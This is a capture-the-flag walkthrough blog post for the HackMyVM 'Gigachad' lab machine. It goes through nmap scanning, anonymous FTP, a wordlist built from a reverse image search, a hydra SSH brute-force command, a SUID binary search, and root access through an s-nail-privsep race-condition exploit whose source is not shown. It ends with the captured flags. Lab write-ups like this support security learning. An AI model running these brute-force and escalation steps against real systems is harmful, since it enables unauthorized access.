0xBEN
/
Sign up to 0xBEN!
Already have an account? Sign in

HackMyVM | Gigachad

In this walkthrough, I demonstrate how I obtained complete ownership of Gigachad from HackMyVM
0xBEN
5 min read
HackMyVM | Gigachad
https://downloads.hackmyvm.eu/gigachad.zip
In: HackMyVM, Attack, CTF, Home Lab, Linux, Easy Challenge
ℹ️
I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access

Nmap Results

# Nmap 7.98 scan initiated Fri Feb  6 20:22:02 2026 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.17
Nmap scan report for 10.9.9.17
Host is up (0.00055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.6.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x    1 1000     1000          297 Feb 07  2021 chadinfo
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_  256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/kingchad.html
|_http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Feb  6 20:22:15 2026 -- 1 IP address (1 host up) scanned in 13.02 seconds
💡
Don't miss an opportunity to find some breadcrumbs in the initial nmap scan output. Notice that the FTP server allows anonymous login on tcp/21 and there's a file called chadinfo. There's also a /kingchad.html entry in robots.txt on the HTTP server on tcp/80.
echo -e '10.9.9.17\t\tgigachad.hmv' | sudo tee -a /etc/hosts

Add a hosts entry for convenience





Service Enumeration

TCP/21

Staying true to my methodology, I'll start by probing the FTP server first. As noted in the initial nmap scan, anonymous login is allowed and there should be a file called chadinfo.

ftp ftp://anonymous:@gigachad.hmv
Output mentions "/drippinchad.png"
File upload is denied



TCP/80

ℹ️
I tried using exiftool, zsteg, binwalk, and some other tools to see if there was some kind of password embedded within, but didn't have any luck. So, the next best idea was to try and do a reverse image search and find something significant about the photo.
Right-click on image and choose "Search image with Google
This could be a clue. I'll form a word list using some keywords from here.
cat << EOF > passwords.txt
maidens
maiden
tower
Maidens Tower
maidenstower
Istanbul
istanbul
Turkey
turkey
Kiz Kulesi
kiz
kulesi
kizkulesi
Leander
leander
Leanders Tower
leanderstower
tower
EOF
hydra -I -f -V -l chad -P passwords.txt ssh://gigachad.hmv





Exploit

Anonymous FTP -> SSH as Chad

  • We found a ZIP file via anonymous FTP access that included the username chad and alluded to a potential password at /drippinchad.png
  • A reverse image allowed us to craft a targeted word list
  • Using public key authentication or, at a minimum, adding countermeasures to password spraying attacks are recommended
ssh chad@gigachad.hmv





Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux gigachad 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Current User

uid=1000(chad) gid=1000(chad) groups=1000(chad)

-bash: sudo: command not found



Network Configurations

Network Interfaces

2: ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:64:5b:76 brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.17/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 5337sec preferred_lft 5337sec
    inet6 fe80::be24:11ff:fe64:5b76/64 scope link 
       valid_lft forever preferred_lft forever

Open Ports

tcp     LISTEN   0        80             127.0.0.1:3306          0.0.0.0:*



Interesting Files

/usr/lib/s-nail/s-nail-privsep

find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null

This SUID binary isn't one I've seen before, so I will do some more research on this.


-rwsr-xr-x 1 root root 10104 Jan  1  2016 /usr/lib/s-nail/s-nail-privsep





Privilege Escalation

Becoming Root

nano pwn.sh

Paste the source code from Exploit DB here, save, and exit

bash pwn.sh

Run the exploit

⚠️
I had to run the exploit multiple times. Because this exploit relies on a race condition, the first time I ran it, the race condition did not occur. The second time, it did, yielding the root shell.



Flags

User

0FAD8F4B099A26E004376EAB42B6A56A

Root

832B123648707C6CD022DD9009AEF2FD
Written by
0xBEN

0xBEN

View all posts
Comments
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.